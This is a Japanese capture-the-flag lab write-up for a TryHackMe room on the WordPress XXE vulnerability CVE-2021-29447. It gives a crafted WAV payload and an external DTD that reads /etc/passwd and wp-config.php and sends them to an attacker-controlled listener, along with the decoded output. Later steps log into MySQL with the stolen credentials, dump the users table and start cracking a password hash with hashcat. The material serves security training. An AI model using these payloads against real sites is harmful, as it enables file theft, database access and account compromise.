はじめに
この記事は、TryHackMeのwriteupです。
RoomはWordpress: CVE-2021-29447、(難易度)はEasyです。
このRoomでは、WordpressのCVE-2021-29447の悪用方法について、学ぶことができます。
Task 1
Task1では、CVE-2021-29447のエクスプロイト方法が書いてあります。
再現方法
手順通りやりましょう。
実際のWebサイトでは以下のように表示されます。
以下のURLにアクセスします。
http://[target_ip]/wp-admin
そして、以下の資格情報でログインしてください。
user: test-corp
password: test
すると、以下のようにもうpayload.wavが入っていました。
ただ、再現するために、payload.wavを作ります。
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://[MY_IP]:9999/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
また、NAMEEVIL.dtdを作成し、ローカルサーバーを立ち上げます。
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://[MY_IP]:9999/?p=%file;'>" >
┌──(rikuxx㉿kali)-[~/tryhackme/Wordpress_CVE-2021-29447]
└─$ python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
その後、payload.wavをアップロードすると、以下のようなログを取得することができます。
┌──(rikuxx㉿kali)-[~/tryhackme/Wordpress_CVE-2021-29447]
└─$ python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
10.48.171.202 - - [14/Jun/2026 22:52:01] "GET /NAMEEVIL.dtd HTTP/1.1" 200 -
10.48.171.202 - - [14/Jun/2026 22:52:02] "GET /?p=hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X HTTP/1.1" 200 -
10.48.171.202 - - [14/Jun/2026 22:52:02] "GET /NAMEEVIL.dtd HTTP/1.1" 200 -
10.48.171.202 - - [14/Jun/2026 22:52:03] "GET /?p=hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X HTTP/1.1" 200 -
先ほど取得した文字列を以下のようなPHPスクリプトを作成し、デコードします。
<?php echo zlib_decode(base64_decode('hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X')); ?>
┌──(rikuxx㉿kali)-[~/tryhackme/Wordpress_CVE-2021-29447]
└─$ php 2.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
stux:x:1000:1000:CVE-2021-29447,,,:/home/stux:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
すると、/etc/passwdの中身を見ることに成功しました。
Task 2
Use the vulnerability CVE-2021-29447 to read the wordpress configuration file.
以下のようにNAMEEVIL.dtdを、/etc/passwdから/var/www/html/wp-config.phpに変更し、再度、payload.wavをアップロードします。
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://[MY_IP]:9999/?p=%file;'>" >
そして、以下のようなログデータを取得できました。
┌──(rikuxx㉿kali)-[~/tryhackme/Wordpress_CVE-2021-29447]
└─$ python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
10.48.171.202 - - [14/Jun/2026 23:01:11] "GET /NAMEEVIL.dtd HTTP/1.1" 200 -
10.48.171.202 - - [14/Jun/2026 23:01:11] "GET /?p=nVZtT+NGEP5cJP7DcK2UKyVxOaSq4lqVQFKCLkdonAjdp2hjr+0Vzu7evoSLTvffO7N2HIdDreA4CWPPPPP+zPzxly704UF0fHx4AMcwKzgsmeWQKJmJ3BvmhJKQKQP3yqR3hltLgo3wo+5Woj3EgcTwSsEmRmgH3nILrhAWMlFySL0RMscXPOgLaR0ry6DRg0/KQ6pkx0HB1hycIm2ShUe+BCscP4ENyiRMBu1E6U0LG+Xf7DnzBphM6VuJhgLOmpWe217L/60yajmG7gSxTJWleiRH95JgzxvFY/i4if8Zg+XOoZytX8Yc43fwwDfbNwPmWEgn/kIz2vBMfKm/9S/ju/5s1IBelEI+QOGctudR9IjZ1pTtnjJ5ZL3WyriIGSeSkkc8FWS42wTcxYCjHZRmyQPL+X7N8DsWOoLjp+5DNyQfEws5+h9yKmSmIDNqRTk3oQSFso6Uoyj0Syi/ZCsOKgt5S7fB7nVLsJti3JK/hc7gcnHb/zjsnECniTBdvuvAz++Dd41vDRg2gQlWnuLM4+GUcNB0ysyDYzLn0v0HkmbWktHvkO76cXw/mQ4Izc71mYnPqJCnZ8/4RUl41p3RJJ4RQKkSVpJUW7fpg6uCGUs5rrobG7MaGWy2dK9XbO87C1ej/jQeBiPeZb+38akUOxuKZgpxNpr3YBBGKikoPXVpM7KbKr90zxiZjMf9WShQy8CPF7+Exup7zLbEHqymfC7FZ8/hAzZ8GLaYla41X1dbo9yG+UxFlnGD+uArRV0YdNgeBeldC0pugv9Bz9uaMuDr/oQwLXpPpiTMXxfnLzrtnUYWvYl2jUgisBPBR7MWCf+2Zzxpu8wcRrUBrQS6TBwiViEOIZFJREo+In0B/yKsq+hCPQiqXCCWR2IeHIWkkqI+tqS9ZbdS5QTKciSeXc4uMFzUeNf7rfdrPbRNefrz2WjxYfgJi7P919HeVRO6l1IoMM9V/RrteHg1nw4XbZAXaI8n19fDweLmdufAC7RvJ7dXw33XX6AdXI7749mrtNtx1yCvirtx4MVx77n+/9r1xHVrwq43845Qm0GftZbKroO2rRz6bOVLJ3TJ93YtsTso2WJspARarblAFc6SIgCxxsPKAkxkuQHpV0vs5BMocXuEB5p8L1N8ThQ6CGgOMY/q7v0p0NmiwoA/kfe1M5tF5307uL9xY6R8zUulEea8FWzKlz7PabpWKuXPcIsIQ+WMD0PFZchJWEfC6pJtaDtJhZSFntX3R21phUwUAOEGx9uCdUbJHEM0PFEr/JryFJGQBXTpcxpVSX9zJIGdr4HG7+8Wg+Hl/Lq+akhImLYZ9GstEJ2eWwRJYdOiNauKT+k/6ho6PLBcKFvZp3IuwypMw3JtknISYNYCr6MqZpV4slGdVK86LRrsrpDdRjR6ykXbkLGvM1ZiDradi+THXMcS551gSpWG+lg5ghHTeLJpvyyFLfDN3vYhxNEknAYBsDVH9Cm+mQ3n03H7a7X6+kurSu9ovbsitELB2/0jsJpOmU1lDBv9LRxBBZwSt1RXGE4e/nw9PPhhxzr1lxNYLAY308UCetCJqhH9trUec6yR1y2Da1zwoVOQx0tPLUQXZr3ODf/s0aGFIo6vDRAs3nHbY4xOVxqOfwE= HTTP/1.1" 200 -
10.48.171.202 - - [14/Jun/2026 23:01:12] "GET /NAMEEVIL.dtd HTTP/1.1" 200 -
10.48.171.202 - - [14/Jun/2026 23:01:12] "GET /?p=nVZtT+NGEP5cJP7DcK2UKyVxOaSq4lqVQFKCLkdonAjdp2hjr+0Vzu7evoSLTvffO7N2HIdDreA4CWPPPPP+zPzxly704UF0fHx4AMcwKzgsmeWQKJmJ3BvmhJKQKQP3yqR3hltLgo3wo+5Woj3EgcTwSsEmRmgH3nILrhAWMlFySL0RMscXPOgLaR0ry6DRg0/KQ6pkx0HB1hycIm2ShUe+BCscP4ENyiRMBu1E6U0LG+Xf7DnzBphM6VuJhgLOmpWe217L/60yajmG7gSxTJWleiRH95JgzxvFY/i4if8Zg+XOoZytX8Yc43fwwDfbNwPmWEgn/kIz2vBMfKm/9S/ju/5s1IBelEI+QOGctudR9IjZ1pTtnjJ5ZL3WyriIGSeSkkc8FWS42wTcxYCjHZRmyQPL+X7N8DsWOoLjp+5DNyQfEws5+h9yKmSmIDNqRTk3oQSFso6Uoyj0Syi/ZCsOKgt5S7fB7nVLsJti3JK/hc7gcnHb/zjsnECniTBdvuvAz++Dd41vDRg2gQlWnuLM4+GUcNB0ysyDYzLn0v0HkmbWktHvkO76cXw/mQ4Izc71mYnPqJCnZ8/4RUl41p3RJJ4RQKkSVpJUW7fpg6uCGUs5rrobG7MaGWy2dK9XbO87C1ej/jQeBiPeZb+38akUOxuKZgpxNpr3YBBGKikoPXVpM7KbKr90zxiZjMf9WShQy8CPF7+Exup7zLbEHqymfC7FZ8/hAzZ8GLaYla41X1dbo9yG+UxFlnGD+uArRV0YdNgeBeldC0pugv9Bz9uaMuDr/oQwLXpPpiTMXxfnLzrtnUYWvYl2jUgisBPBR7MWCf+2Zzxpu8wcRrUBrQS6TBwiViEOIZFJREo+In0B/yKsq+hCPQiqXCCWR2IeHIWkkqI+tqS9ZbdS5QTKciSeXc4uMFzUeNf7rfdrPbRNefrz2WjxYfgJi7P919HeVRO6l1IoMM9V/RrteHg1nw4XbZAXaI8n19fDweLmdufAC7RvJ7dXw33XX6AdXI7749mrtNtx1yCvirtx4MVx77n+/9r1xHVrwq43845Qm0GftZbKroO2rRz6bOVLJ3TJ93YtsTso2WJspARarblAFc6SIgCxxsPKAkxkuQHpV0vs5BMocXuEB5p8L1N8ThQ6CGgOMY/q7v0p0NmiwoA/kfe1M5tF5307uL9xY6R8zUulEea8FWzKlz7PabpWKuXPcIsIQ+WMD0PFZchJWEfC6pJtaDtJhZSFntX3R21phUwUAOEGx9uCdUbJHEM0PFEr/JryFJGQBXTpcxpVSX9zJIGdr4HG7+8Wg+Hl/Lq+akhImLYZ9GstEJ2eWwRJYdOiNauKT+k/6ho6PLBcKFvZp3IuwypMw3JtknISYNYCr6MqZpV4slGdVK86LRrsrpDdRjR6ykXbkLGvM1ZiDradi+THXMcS551gSpWG+lg5ghHTeLJpvyyFLfDN3vYhxNEknAYBsDVH9Cm+mQ3n03H7a7X6+kurSu9ovbsitELB2/0jsJpOmU1lDBv9LRxBBZwSt1RXGE4e/nw9PPhhxzr1lxNYLAY308UCetCJqhH9trUec6yR1y2Da1zwoVOQx0tPLUQXZr3ODf/s0aGFIo6vDRAs3nHbY4xOVxqOfwE= HTTP/1.1" 200 -
デコードすると、中身を取得することができます。
<?php echo zlib_decode(base64_decode('nVZtT+NGEP5cJP7DcK2UKyVxOaSq4lqVQFKCLkdonAjdp2hjr+0Vzu7evoSLTvffO7N2HIdDreA4CWPPPPP+zPzxly704UF0fHx4AMcwKzgsmeWQKJmJ3BvmhJKQKQP3yqR3hltLgo3wo+5Woj3EgcTwSsEmRmgH3nILrhAWMlFySL0RMscXPOgLaR0ry6DRg0/KQ6pkx0HB1hycIm2ShUe+BCscP4ENyiRMBu1E6U0LG+Xf7DnzBphM6VuJhgLOmpWe217L/60yajmG7gSxTJWleiRH95JgzxvFY/i4if8Zg+XOoZytX8Yc43fwwDfbNwPmWEgn/kIz2vBMfKm/9S/ju/5s1IBelEI+QOGctudR9IjZ1pTtnjJ5ZL3WyriIGSeSkkc8FWS42wTcxYCjHZRmyQPL+X7N8DsWOoLjp+5DNyQfEws5+h9yKmSmIDNqRTk3oQSFso6Uoyj0Syi/ZCsOKgt5S7fB7nVLsJti3JK/hc7gcnHb/zjsnECniTBdvuvAz++Dd41vDRg2gQlWnuLM4+GUcNB0ysyDYzLn0v0HkmbWktHvkO76cXw/mQ4Izc71mYnPqJCnZ8/4RUl41p3RJJ4RQKkSVpJUW7fpg6uCGUs5rrobG7MaGWy2dK9XbO87C1ej/jQeBiPeZb+38akUOxuKZgpxNpr3YBBGKikoPXVpM7KbKr90zxiZjMf9WShQy8CPF7+Exup7zLbEHqymfC7FZ8/hAzZ8GLaYla41X1dbo9yG+UxFlnGD+uArRV0YdNgeBeldC0pugv9Bz9uaMuDr/oQwLXpPpiTMXxfnLzrtnUYWvYl2jUgisBPBR7MWCf+2Zzxpu8wcRrUBrQS6TBwiViEOIZFJREo+In0B/yKsq+hCPQiqXCCWR2IeHIWkkqI+tqS9ZbdS5QTKciSeXc4uMFzUeNf7rfdrPbRNefrz2WjxYfgJi7P919HeVRO6l1IoMM9V/RrteHg1nw4XbZAXaI8n19fDweLmdufAC7RvJ7dXw33XX6AdXI7749mrtNtx1yCvirtx4MVx77n+/9r1xHVrwq43845Qm0GftZbKroO2rRz6bOVLJ3TJ93YtsTso2WJspARarblAFc6SIgCxxsPKAkxkuQHpV0vs5BMocXuEB5p8L1N8ThQ6CGgOMY/q7v0p0NmiwoA/kfe1M5tF5307uL9xY6R8zUulEea8FWzKlz7PabpWKuXPcIsIQ+WMD0PFZchJWEfC6pJtaDtJhZSFntX3R21phUwUAOEGx9uCdUbJHEM0PFEr/JryFJGQBXTpcxpVSX9zJIGdr4HG7+8Wg+Hl/Lq+akhImLYZ9GstEJ2eWwRJYdOiNauKT+k/6ho6PLBcKFvZp3IuwypMw3JtknISYNYCr6MqZpV4slGdVK86LRrsrpDdRjR6ykXbkLGvM1ZiDradi+THXMcS551gSpWG+lg5ghHTeLJpvyyFLfDN3vYhxNEknAYBsDVH9Cm+mQ3n03H7a7X6+kurSu9ovbsitELB2/0jsJpOmU1lDBv9LRxBBZwSt1RXGE4e/nw9PPhhxzr1lxNYLAY308UCetCJqhH9trUec6yR1y2Da1zwoVOQx0tPLUQXZr3ODf/s0aGFIo6vDRAs3nHbY4xOVxqOfwE=')); ?>
┌──(rikuxx㉿kali)-[~/tryhackme/Wordpress_CVE-2021-29447]
└─$ php 3.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', '[WORDPRESS_DATABASE]' );
/** MySQL database username */
define( 'DB_USER', '[DB_USER]' );
/** MySQL database password */
define( 'DB_PASSWORD', '[DB_PASSWORD]' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wptry_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
define('WP_HOME', false);
define('WP_SITEURL', false);
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
Based on the results of #1, what is the name of the database for WordPress?
Answer: [WORDPRESS_DATABASE]
Based on the results of #1, what are the credentials you found?
Answer: [DB_USER]:[DB_PASSWORD]
Enumerate and identify what is the dbms installed on the server?
Answer: [DBMS_NAME]
Based on the results of #4, what is the dbms version installed on the server?
ポートスキャンをします。
Scanned at 2026-06-14 23:07:42 JST for 13s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f0:65:b8:42:b7:c3:ba:8e:fe:e4:3c:cd:57:f1:29:2e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcR2YGlO+RE25XRqWOY3iSi0YN74QA7E8aywAFyZ/wr3/YQ0jEDjuubawCZ9LtNF0midFnnvvwrkNkgB1BpIm+5aPDDFvSYD27N8N2ttRtlqpNn9f/19sy8tg+wqgMER+peUep4MwbyQlqXF47qLLAX8nHakWw9x2+jQfdFzzjT2zPdTSCQj2NJpvKdDydQ2tgyuLLs5G34tRMLY50fhuSGT2UQy5UIExU93QBc1tJF1SG+6dJDFH1sF+H2W46ia6+F+ahBRJW3U4KFrVKdiPJY9WRwplgxWSXUUAC8MZCc2cu5SRw/RIyhOo8UrXvTdK3FW8daHwP4jJmG7SttTBl
| 256 42:1e:1b:8f:19:38:99:2e:36:70:cf:0e:b6:31:92:14 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF38YSGKHd8ih4VMad2mCdquKkSrnV9HcQInJk5Fjid6dfvdZ9KfhhltpAc7JfUdLCxeQJgAJjw85FyVbW4/Yyw=
| 256 8e:89:43:de:5d:9b:99:66:c4:2a:93:17:f3:0e:e1:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOctHMK4vQg3/HTOb2aPZuDEfPfw1CZa7KEB2FgIrvcj
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Tryhackme – Just another WordPress site
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.6.2
[DB_PORT]/tcp open mysql syn-ack ttl 62 MySQL [DB_VERSION]-0ubuntu0.16.04.1
| mysql-info:
| Protocol: 10
| Version: [DB_VERSION]-0ubuntu0.16.04.1
| Thread ID: 41
| Capabilities flags: 65535
| Some Capabilities: SupportsCompression, ODBCClient, ConnectWithDatabase, LongColumnFlag, LongPassword, Support41Auth, DontAllowDatabaseTableColumn, InteractiveClient, SwitchToSSLAfterHandshake, SupportsLoadDataLocal, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolOld, FoundRows, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: %xL:z;E3e%fZ)\x1B\x02#T2po
|_ Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.33_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_5.7.33_Auto_Generated_CA_Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-26T21:23:31
| Not valid after: 2031-05-24T21:23:31
| MD5: 11ba f643 0f68 ea0d 7b7f c7d5 7822 edbf
| SHA-1: d85c 8df5 d53c ea63 666b 25d5 66d0 3c14 07be 3feb
| SHA-256: 0452 69f2 8606 b8b4 9119 9018 bc7e 5b6c d879 40ff 5415 c143 4708 2958 5b88 f0d0
| -----BEGIN CERTIFICATE-----
| MIIDBzCCAe+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADA8MTowOAYDVQQDDDFNeVNR
| TF9TZXJ2ZXJfNS43LjMzX0F1dG9fR2VuZXJhdGVkX0NBX0NlcnRpZmljYXRlMB4X
| DTIxMDUyNjIxMjMzMVoXDTMxMDUyNDIxMjMzMVowQDE+MDwGA1UEAww1TXlTUUxf
| U2VydmVyXzUuNy4zM19BdXRvX0dlbmVyYXRlZF9TZXJ2ZXJfQ2VydGlmaWNhdGUw
| ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7g4pUauY914tl4RkcpQec
| GKvuJKIlaCZhxV5OaKQ0iflswSNIR2k2e9eN2zo06wgCfaRqQqD/wpaz2/me622h
| hO+fdFeL9CBycNAuUJC/I9YzKSH2kv4/DVo5Ej/nb9poNDgeHf4+VvGiDNuVU6HD
| +5cZEHw/47NP+51+03rK6sEG3Wc+sKkTnMaNr+hiiL75YyJmDY83z/gErufDWWkd
| 47RJ3N2Km4CvnT3FwyVCE4Bc9ixA1fcZVkK4UFqn4a+B59k3rU6gorUxzZVnh5Iq
| 2JiyULtU7TxcfZ03ONx16E1mrw7D/Py+JgBF3hVa0nlo9Y9kRCiwoF1AkWmMS5Z7
| AgMBAAGjEDAOMAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggEBANMjsaix
| wkIH3E5m27aYby+4HItU5I0qTDALbQktZcWZOG+HGhdLOtCnPiGwuEPQ7or4HMi3
| I9/Y4E5Cwqeb0CgWh/Nt+6N/VDqNSaGfH1G8oX3oXhUBJ+G8CIyDGvNVme2o5IwY
| FFjRn0UbhHfQl5U76xOAeXdRgT6u2xQw5gvm6oVYZERSpOLGPvfCwRLyRcGaBjs/
| ATGgR39CcZmOV0TPmxWmvpca5TaL5m3kaCSlpwxyqZxYxjGQiWhU4geAQ8STImQQ
| dZimtduyhdZ600BremRZIzWNdfSNPnTbIiJyhQt/AziBgARrCtn67gTmv6IwY4w4
| IDu2bCdtm64gNoU=
|_-----END CERTIFICATE-----
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Answer: [DB_VERSION]
Based on the results of #4, what port is the dbms running on?
Answer: [DB_PORT]
Compromise the dbms, What is the encrypted password located in the wordpress users table with id 1??
以下のようにDBに接続を試みます。
┌──(rikuxx㉿kali)-[~/tryhackme/Wordpress_CVE-2021-29447]
└─$ mysql -h [target_ip] -u [DB_USER] -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 81
Server version: [DB_VERSION]-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
接続に成功後、先ほど見つけたデータベース名を選択します。
MySQL [(none)]> use [WORDPRESS_DATABASE]
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
実際に、テーブル一覧を見てみましょう。
MySQL [WORDPRESS_DATABASE]> SHOW TABLES;
+--------------------------+
| Tables_in_wordpressdb2 |
+--------------------------+
| wptry_commentmeta |
| wptry_comments |
| wptry_links |
| wptry_options |
| wptry_postmeta |
| wptry_posts |
| wptry_term_relationships |
| wptry_term_taxonomy |
| wptry_termmeta |
| wptry_terms |
| wptry_usermeta |
| wptry_users |
+--------------------------+
12 rows in set (0.258 sec)
実際に、SQL文を組み立てて、ユーザーテーブルっぽいwptry_usersをID=1で見てましょう。
MySQL [WORDPRESS_DATABASE]> SELECT * FROM wptry_users
-> WHERE ID =1;
+----+------------+------------------------------------+---------------+-----------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
| 1 | corp-001 | [CORP-001_HASH] | corp-001 | corp-001@fakemail.com | http://192.168.85.131/wordpress2 | 2021-05-26 23:35:28 | | 0 | corp-001 |
+----+------------+------------------------------------+---------------+-----------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.145 sec)
よって、見つけることに成功しました。
Answer: [CORP-001_HASH]
Based on the results of #7, What is the password in plaint text?
先ほど取得した文字列を復号します。
┌──(rikuxx㉿kali)-[~/tryhackme/Wordpress_CVE-2021-29447]
└─$ nano hash.txt
┌──(rikuxx㉿kali)-[~/tryhackme/Wordpress_CVE-2021-29447]
└─$ hashcat -m 400 -O hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
